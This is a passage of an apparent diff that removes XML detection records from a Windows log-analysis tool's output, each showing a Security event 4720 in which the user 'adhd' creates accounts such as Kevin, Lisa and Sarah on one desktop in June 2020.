-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-12T19:02:51.1793227Z'/&gt;&lt;EventRecordID&gt;7988&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d35d86c8-40e0-0001-8987-5dd3e040d601}'/&gt;&lt;Execution ProcessID='724' ThreadID='9436'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;stran&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1202&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1a01b&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;stran&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>stran</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>7979</recordid>
-            <time>2020-06-12 19:02:51.94207200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-12T19:02:51.0942072Z'/&gt;&lt;EventRecordID&gt;7979&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d35d86c8-40e0-0001-8987-5dd3e040d601}'/&gt;&lt;Execution ProcessID='724' ThreadID='9436'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;spurr&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1201&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1a01b&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;spurr&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>spurr</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5245</recordid>
-            <time>2020-06-11 22:05:10.325695500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:10.3256955Z'/&gt;&lt;EventRecordID&gt;5245&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kevin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1200&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kevin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kevin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5239</recordid>
-            <time>2020-06-11 22:05:10.98439200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:10.0984392Z'/&gt;&lt;EventRecordID&gt;5239&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lisa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1199&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lisa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lisa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5233</recordid>
-            <time>2020-06-11 22:05:10.1893600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:10.0018936Z'/&gt;&lt;EventRecordID&gt;5233&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Mildred&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1198&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Mildred&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Mildred</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5227</recordid>
-            <time>2020-06-11 22:05:09.905376700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.9053767Z'/&gt;&lt;EventRecordID&gt;5227&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lauren&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1197&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lauren&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lauren</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5221</recordid>
-            <time>2020-06-11 22:05:09.806456500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.8064565Z'/&gt;&lt;EventRecordID&gt;5221&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Douglas&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1196&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Douglas&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Douglas</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5215</recordid>
-            <time>2020-06-11 22:05:09.716380800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.7163808Z'/&gt;&lt;EventRecordID&gt;5215&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Roy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1195&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Roy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Roy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5209</recordid>
-            <time>2020-06-11 22:05:09.629194500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.6291945Z'/&gt;&lt;EventRecordID&gt;5209&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sarah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1194&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sarah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sarah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5203</recordid>
-            <time>2020-06-11 22:05:09.547178700Z</time>
-            <channel>Security</channel>
